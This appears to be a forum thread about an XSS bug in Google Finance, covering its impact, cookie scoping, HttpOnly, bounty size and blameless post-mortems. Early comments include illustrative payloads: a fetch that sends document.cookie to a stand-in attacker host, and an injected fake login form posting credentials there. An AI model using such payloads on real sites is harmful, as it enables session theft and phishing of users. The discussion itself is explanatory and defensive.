Does anyone else feel that XSS on google.com is probably worth a bit more to the wrong people than $5k? Arbitrary-eval is pretty much the worst. Unless I'm missing something, somebody could steal a user's cookie strings and post them to an arbitrary endpoint, which could then use them to log into, e.g. GMail, which an attacker could then use to trigger and retrieve password-reset links for all sorts of other sites.
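To make it concrete, here's a minimal sketch of what an injected payload could do (https://attacker.example is a hypothetical collection endpoint; a real payload could be anything):

    // Hypothetical injected payload: exfiltrate whatever cookies are
    // visible to script on the compromised origin. Note that HttpOnly
    // cookies never show up in document.cookie.
    fetch("https://attacker.example/steal", {
      method: "POST",
      mode: "no-cors",        // fire-and-forget; no response needed
      body: document.cookie,  // every script-readable cookie for google.com
    });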
When I worked at Yahoo, an XSS on yahoo.com (which almost never happened) was a code-red, drop-everything, holy-shit event. If I were at Google I'd probably give this guy a bonus.
In addition to the session ID cookies, you need the HSID cookie as well, which is HttpOnly. While this type of bug is bad, it doesn't allow a malicious third party to get all of the cookies needed to take over the user's session.
Why bother with session cookies when you can just throw up an official-looking login dialog on the google.com domain and steal credentials from any user who isn't paying close attention?
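Something as crude as this sketch would already fool plenty of people, because the address bar genuinely says google.com (the endpoint is, again, hypothetical):

    // Hypothetical phishing overlay injected via the XSS. Since it
    // renders on the real google.com origin, the address bar gives
    // the user no warning at all.
    const overlay = document.createElement("div");
    overlay.style.cssText =
      "position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:99999";
    overlay.innerHTML = `
      <form action="https://attacker.example/creds" method="POST">
        <h1>Sign in to continue</h1>
        <input name="email" placeholder="Email">
        <input name="password" type="password" placeholder="Password">
        <button>Sign in</button>
      </form>`;
    document.body.appendChild(overlay);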
I use Google Finance, Yahoo Finance, Marketwatch, Bloomberg and the WSJ stock pages very frequently and can confirm that Google Finance was on finance.google.com until quite recently. Pretty sure it was there earlier this year.
Yes, but Google Finance is on google.com/finance (for some reason; I'm sure it used to be finance.google.com at some point...).
Cookies set for just subdomain.hostname.com can only be "seen by" that particular subdomain, while cookies set for hostname.com can be seen by hostname.com and any and all of its subdomains. I think that's why Google keeps putting products on paths rather than subdomains; stuff like www.google.com/glass certainly makes no sense otherwise. Why not make a fancy new domain for that? I think it's cookie greed.
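To illustrate the scoping (cookie names and values here are just illustrative):

    // Run on finance.google.com:
    // Host-only cookie: sent back to finance.google.com and nowhere else.
    document.cookie = "finance_pref=compact; path=/";
    // Domain cookie: sent to google.com and every one of its subdomains.
    document.cookie = "SID=abc123; domain=.google.com; path=/";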
Cookie greed doesn't explain it, because they don't issue any cookies for www.google.com specifically; at least, I don't have any. They do issue cookies for .google.com, which www and finance can access equally. It's either a branding thing, or a "we paid for the fancy load balancer, so we're going to use it" thing.
That's a good point, I stand corrected. Of course, if you wanted to be "minimal" about cookies, you'd have to use a subdomain, but using one doesn't mean anything by itself.
The cookie scenario is not really practical, since you can prevent JavaScript from reading cookies with the HttpOnly flag, and I'd bet Google uses HttpOnly cookies where it matters.
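For anyone unfamiliar, the flag is set server-side and the client-side effect is simple (cookie name and value illustrative):

    // Server response header (illustrative):
    //   Set-Cookie: HSID=abc123; Domain=.google.com; Secure; HttpOnly
    //
    // In the browser, injected script simply never sees it:
    console.log(document.cookie);  // HSID does not appear here, so a
    // payload that exfiltrates document.cookie never captures the
    // HttpOnly session cookies.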
The real threats, I imagine, are the social engineering it enables and running code on users' machines through browser plugin vulnerabilities. Also, running a signed Java applet with a fake certificate only takes a single dialog confirmation from the user.
I wonder whether emailing them and asking for, say, a $25k reward before disclosure exposes one to criminal liability.
I mean, is there a law making it illegal to sell exploits on the black market? These bug bounty programs must know they're competing with a large market for this sort of thing.
I think the goal of the $5000 is not to discourage criminals, but rather to encourage someone who notices an issue to write it up, produce a test case, bother to send an email to security@, and then follow up rather than just say "LOL, idiots" and move on with their life.
The $5000 is also a nice incentive to keep looking around.
Not always. For example, making truthful factual statements with malicious intent to harm someone's business by damaging their reputation is totally legal, provided you're not defrauding or blackmailing anyone or otherwise acting sketchy.
There are a lot of actions based on malicious intent that are (and should remain) legal.
Slightly off topic, but if a bug like this is discovered does the engineer who wrote it get notified?
It would be funny to have a sort of wall of shame for the week, or something similar internally. You could even go as far as making the engineer pay the bug bounty (though that's a bit much). Does anyone have experience with what happens on Google's end, besides the obvious patching of the bug and paying of the bounty?
A wall of shame sounds amusing at first blush, but it would quickly become a source of a lot of negativity and unhappiness. Yes, developers need to be aware of bugs, and learn from mistakes, but intentional harassment seems a step too far. I know I've written thousands of bugs.
A friend who used to work at Apple once told me a story about their department hanging a big banner over the desk of the last person to break the build. Eventually a frustrated recipient of the banner fixed the problems that made the build brittle in the first place, and as a result kept the banner for months because nobody broke the build after him. A rather unexpected disincentive to solve the problem.
I agree it can definitely turn counter-productive quickly. On the other hand, if not a wall of shame, I would like to know what happened if it was my code.
It might be funny but I can't imagine that shaming engineers like that would be very productive. Anyone talented enough to be working at a place like Google is likely going to be plenty embarrassed without a "wall of shame" to make sure everyone knows who screwed up.
Not a Google employee but I'd imagine they'd have to do some kind of writeup about what happened/how future errors like this will be prevented.
But whose fault is it? Is it the programmer's fault for writing the bug? QA's fault for missing it? Or the lead's fault for signing off on buggy code?
You can point the blame at a lot of people, but in the end it's highly unproductive and a waste of time. You fix the bug and move on. If programming teams played the blame game every time a bug came up, it would just slow everyone down.
All very good questions. I wasn't thinking about it as a blame game, though I do see how it could quickly become that.
I was thinking, firstly, along the lines of having some ammo to make fun of people with (insult-based humor is the basis for most of my relationships). Also, on a more practical note, as a developer myself I would like to know when my code breaks and why.
Actually, there was (and probably still is) an internal newsletter from the security team about the latest issues, which anyone doing anything customer-facing should read. I really enjoyed it: the writing was creative (engaging as opposed to obfuscating :-) and the topics read like logic puzzles.
It's not particularly constructive to think of individuals as being responsible for single bugs. Bugs are random events, and their probability increases as people and processes become complacent.
A good way to react to this bug is to come up with ideas for reducing the probability of future bugs: static analysis tools, making code reviews easier, and so on. One might also think up ways to lower the impact of future bugs: make session cookies unavailable to JavaScript, propose new standards for the web, etc.
It's important to think of it from a statistical standpoint. Given two equally skilled developers, the one that implements more features is more likely to be involved in a production incident. If we punish people for bugs, we're punishing productivity in addition to sloppiness. That sets the incentives incorrectly. It isn't even a good idea to blame one person: if you scare one person into compliance, you still have the 29,999 other SWEs that aren't scared into compliance. Much better to develop tools that make bugs easier to spot, because every hour you spend doing that helps 29,999x as many people.
Disclaimer: I wasn't involved in this particular bug at all so I'm speaking generally.
We definitely don't play the blame game but we do keep track of bug statistics so we know where best to spend our time and effort. It can be useful to know that projects using framework X have more issues than framework Y or that maybe we should arrange to run some security classes at office Z.
Bugs like this one are fixed with the help of the product team, they're usually the ones writing and pushing the fix (since they know the project best) and it's a good way to get some practical security experience spread around the organization (and increase awareness).
We do write post-mortems for serious issues to delve into the root cause and to help stop it from happening again. We have a lot of initiatives in place to improve the security of our products overall through both awareness raising (training, newsletters, security puzzles) and technology changes (scanners, static analysis, framework hardening).
P.S. We're always looking for security people to join us at Google (send me your resume; email in profile), or you can hunt for bugs to submit to our vulnerability reward program.
Praise your employees in public. Correct them in private.
People like to be lauded for their accomplishments, but nobody wants to be known as "that guy who wrote a severe XSS bug."
Build-breaker banners are a bit of an exception, since it's not the end of the world if the current build is broken; another commit, and the problem's resolved. A public XSS, though... that's more severe.
That's needlessly vicious. You don't need a wall of shame. Just report the bug back to the original programmer and they'll feel bad enough as it is.
Also, generally speaking, it's not one person's fault. At the very least they also have a reviewer who should have caught it.
What actually happens in a healthy organization is that someone writes a postmortem going through all the steps leading to the bad outcome, along with a plan to make fixes at multiple levels to make sure nothing like it happens again.
I hope the engineer(s) who wrote it get notified, so that they get feedback on their decisions. If I write code with bugs that make it to production, I sure would like to know, even if I'm not the one fixing it.
(This is the major reason why I think having sustaining/continuing engineering departments in software companies is a bad idea).
I'm not familiar with Google Finance, but the author states: "This part of the code is responsible for querying an external domain for a newsfeed to be displayed on the plot as an overlay." I'm guessing he just happened to come across a Google Finance URL using the &ntrssurl= parameter and figured it would be worth digging into.
He also says in the comments:
"Manual testing, the ntrssurl parameter was present in an example in the documentation for adding custom news feeds to the plot :) ."
It really wouldn't; URLs like this in parameters are a huge red flag for both humans and automated tools. Any half-decent analyzer would just need to see that parameter on any page it scraped.
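A scanner only needs a check along these lines (a sketch, assuming you already crawl pages and collect their links):

    // Minimal sketch: flag query parameters whose values look like
    // URLs, since they're prime candidates for injection points
    // like ntrssurl.
    function urlValuedParams(link: string): string[] {
      const flagged: string[] = [];
      new URL(link).searchParams.forEach((value, name) => {
        if (/^https?:\/\//i.test(value)) flagged.push(name);
      });
      return flagged;
    }

    // The Google Finance URL from the post would be flagged immediately:
    console.log(urlValuedParams(
      "https://www.google.com/finance?q=GOOG&ntrssurl=http://example.com/feed.rss"
    )); // -> ["ntrssurl"]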